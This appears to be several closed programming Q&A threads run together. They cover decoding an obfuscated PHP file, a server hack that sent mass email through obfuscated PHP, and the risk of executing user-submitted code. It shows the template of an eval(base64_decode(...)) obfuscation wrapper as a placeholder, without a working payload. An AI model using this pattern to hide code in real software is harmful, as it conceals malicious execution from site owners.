Here is your plain source code of the asked file.
As I said in a post earlier today. If you have access to the .php file, you have access to the source no matter what.
Good luck!
This is actually pretty easy. Your encrypted file looks like this:
<?php $_F=__FILE__;$_X='encrypted text';eval(base64_decode('rubbish'));?>
Paste just the 'encrypted text' section into the top box of this page and hit Decode This Rubbish.
Closed. This question needs details or clarity. It is not currently accepting answers.
Want to improve this question? Add details and clarify the problem by editing this post.
Closed 8 years ago.
Improve this question
Found a weird hack today someone was exploiting,
was wondering how this arbitary code could execute thousands of emails an hour.
http://pastebin.com/m7nBSmfB
There's nothing weird about the code you posted -- it builds up a PHP function in an obfuscated fashion -- then it calls the generated code.
The real problem/issue is, how is your server being made to run this code? If you have indeed been exploited by this, it's because you're allowing them to run arbitrary PHP code on your server.
You need to figure out how that happened.
Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 8 years ago.
Improve this question
So I'm kind of tossing an idea around in my head... is it feasible to write a webapp that asks for a user to input a snippet of code, and then compiles it remotely on a server, and returns the output back to the user?
feasible sure, you could definitely make this work from a technical point of view. but in terms of security, it sounds very dangerous.